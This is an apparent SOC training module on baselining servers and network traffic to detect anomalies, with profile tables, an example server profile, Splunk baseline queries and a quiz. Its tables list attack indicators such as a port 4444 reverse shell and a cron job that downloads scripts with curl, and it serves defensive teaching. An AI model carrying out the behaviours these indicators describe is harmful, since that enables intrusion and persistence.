Network & Server Profiling

Establishing baselines for anomaly detection

Week 5 TOPIC 5.5 - IR & Forensics Fundamentals

What is Network/Server Profiling?

Network and server profiling involves establishing "normal" behavior patterns for systems and network traffic. This baseline enables detection of anomalies that may indicate compromise, misconfiguration, or performance issues. Without a baseline, every event looks the same.

Why Profiling Matters

Anomaly Detection

Know what's normal so you can spot what's abnormal. A server making outbound DNS queries might be normal - or might indicate C2.

Reduced False Positives

Baseline-aware rules generate fewer alerts because expected behavior is filtered out.

Faster Triage

When you know a system's profile, you can quickly determine if activity is suspicious or business-as-usual.

Incident Investigation

Historical baselines help identify when anomalous behavior started - crucial for timeline building.

What to Profile — Server Baseline Attributes

A complete server profile captures these attributes. Any deviation from baseline warrants investigation:

AttributeNormal Baseline ExampleSuspicious Deviation
Listening portsWeb server: 80, 443, 22New port 4444 opened (potential reverse shell)
Running processesnginx, sshd, syslog-ngUnknown process kworker-update running as www-data
Outbound connectionsUpdates to apt.ubuntu.com, NTP to time.nist.govHTTP to unknown IP in Eastern Europe at 3 AM
CPU / MemoryAverage 15% CPU, 4GB RAM usedSustained 95% CPU (crypto mining or DDoS participation)
DNS queriesResolves company domains, CDN endpointsHigh volume DNS queries to newly registered domains (DGA detection)
User loginsAdmin SSH from jump box during business hoursRoot login via password from external IP at 2 AM
Scheduled tasksCron: logrotate daily, backup at midnightNew cron entry running curl to download a script every 5 minutes

Network Baseline — What Normal Traffic Looks Like

# Example: Normal vs Anomalous NetFlow for a database server NORMAL: Internal only traffic (10.0.0.0/8) Port 3306 (MySQL) from app servers only ~2 GB/day data transfer Peak hours: 08:00-18:00 ANOMALOUS: External connection to 185.234.x.x:443 Port 3306 queried from unknown workstation 15 GB transferred in 2 hours (10x normal) Activity spike at 03:00 on Saturday
Foundation Content

This topic extends the Log Basics presentation from Eye House, adding practical profiling techniques for SOC operations.

Source: Eye House > Presentations > Log Basics Open Source Content

Key Profiling Elements

Network Profile Components

Element What to Baseline Anomaly Example
Traffic Volume Bytes/packets per hour by segment 10x normal traffic at 3 AM
Protocol Distribution % HTTP, DNS, SMB, etc. Sudden spike in DNS traffic
Connection Patterns Common src-dst pairs Workstation connecting to file server directly
Port Usage Expected ports by system type Web server making outbound port 4444
Geographic Destinations Normal countries for traffic Traffic to unexpected foreign IPs

Server Profile Components

Running Services

List of expected services/processes. New unknown process = investigate.

User Accounts

Expected local/domain accounts. New admin account = red flag.

Listening Ports

Expected network ports. Unexpected listener = backdoor potential.

Scheduled Tasks

Known cron jobs/scheduled tasks. New persistence mechanism = investigate.

Example Server Profile

# Web Server Profile: PROD-WEB-01 Hostname: PROD-WEB-01 Role: Production Web Server OS: Ubuntu 22.04 LTS IP: 10.1.2.100 Expected Services: - nginx (port 80, 443) - node (port 3000 - internal only) - sshd (port 22 - admin subnet only) Expected Connections: - Inbound: Any → 80, 443 - Inbound: 10.1.1.0/24 → 22 - Outbound: → 10.1.3.50 (database) - Outbound: → 10.1.4.10 (logging) Admin Accounts: webadmin, svc-deploy Anomaly: Any outbound to internet = INVESTIGATE

SOC Analyst Application

Using Profiles for Alert Triage

Alert Without Profile With Profile
Outbound SSH from 10.1.2.100 Unknown - need to research Web server - should NEVER initiate SSH. High priority!
Large file transfer at 2 AM Suspicious timing Backup server - scheduled backup window. Expected.
New listening port 8080 Unknown service Dev server - expected for testing. Verify with owner.
Connection to foreign IP Potentially suspicious CDN server - expected for content delivery. Normal.

Building Profiles in Practice

1. Asset Inventory

Start with CMDB or asset management. Know what systems exist.

2. Traffic Analysis

Use NetFlow/IPFIX to establish traffic patterns over 30+ days.

3. Log Analysis

Review authentication logs, service logs to understand normal behavior.

4. Document & Update

Profiles change! Review quarterly or after major changes.

SOC Analyst Tip

Profile Your Critical Assets First: You can't profile everything. Start with crown jewels - domain controllers, database servers, key applications. These are high-value targets where anomaly detection matters most.

SIEM Baseline Queries

// Splunk: Establish outbound connection baseline by server index=firewall action=allowed direction=outbound | stats dc(dest_ip) as unique_destinations, sum(bytes) as total_bytes by src_ip | where total_bytes > 1000000 | sort - total_bytes // Run weekly, compare to previous weeks // Find new listening ports index=endpoint sourcetype=osquery | search listening_ports | stats earliest(_time) as first_seen by host, port, process | where first_seen > relative_time(now(), "-7d") // Ports opened in last 7 days - compare to baseline

Knowledge Check

Test your understanding of network/server profiling. Score 80% or higher to pass.

1. What is the primary purpose of network/server profiling?

2. A web server suddenly begins making outbound connections to port 4444. Why is this concerning?

3. Which element is NOT typically part of a server profile?

4. How often should system profiles be reviewed and updated?

5. Which systems should be profiled FIRST in a SOC environment?